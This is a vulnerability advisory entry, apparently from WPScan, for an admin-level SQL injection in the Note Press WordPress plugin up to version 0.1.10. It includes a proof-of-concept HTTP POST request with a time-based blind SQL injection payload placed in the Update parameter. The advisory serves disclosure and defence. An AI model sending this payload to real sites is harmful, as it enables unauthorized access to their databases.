Lucene search

K
wpvulndbDaniel KrohmerWPVDB-ID:982F84A1-216D-41ED-87BD-433B695CEC28
HistoryMay 09, 2022 - 12:00 a.m.

Note Press <= 0.1.10 - Admin+ SQLi via Update

2022-05-0900:00:00
Daniel Krohmer
wpscan.com
5

0.001 Low

EPSS

Percentile

21.8%

The plugin does not sanitise and escape the Update parameter before using it in a SQL statement when updating a note via the admin dashboard, leading to an SQL injection

PoC

POST /wp-admin/admin.php?page=Note_Press-Main-Menu&action;=edit&id;=17 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-admin/admin.php?page=Note_Press-Main-Menu&amp;action;=edit&amp;id;=17 Content-Type: application/x-www-form-urlencoded Content-Length: 186 Origin: http://localhost DNT: 1 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 _wpnonce=f5b4b02f56&Title;=Test&stickycolor;=&Deadline;=&Priority;=0&iconselect;%5B%5D=aablank.png&display;_name=admin&Note;_Presseditor=&Update;=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)

CPENameOperatorVersion
note-presseq*

0.001 Low

EPSS

Percentile

21.8%

Related for WPVDB-ID:982F84A1-216D-41ED-87BD-433B695CEC28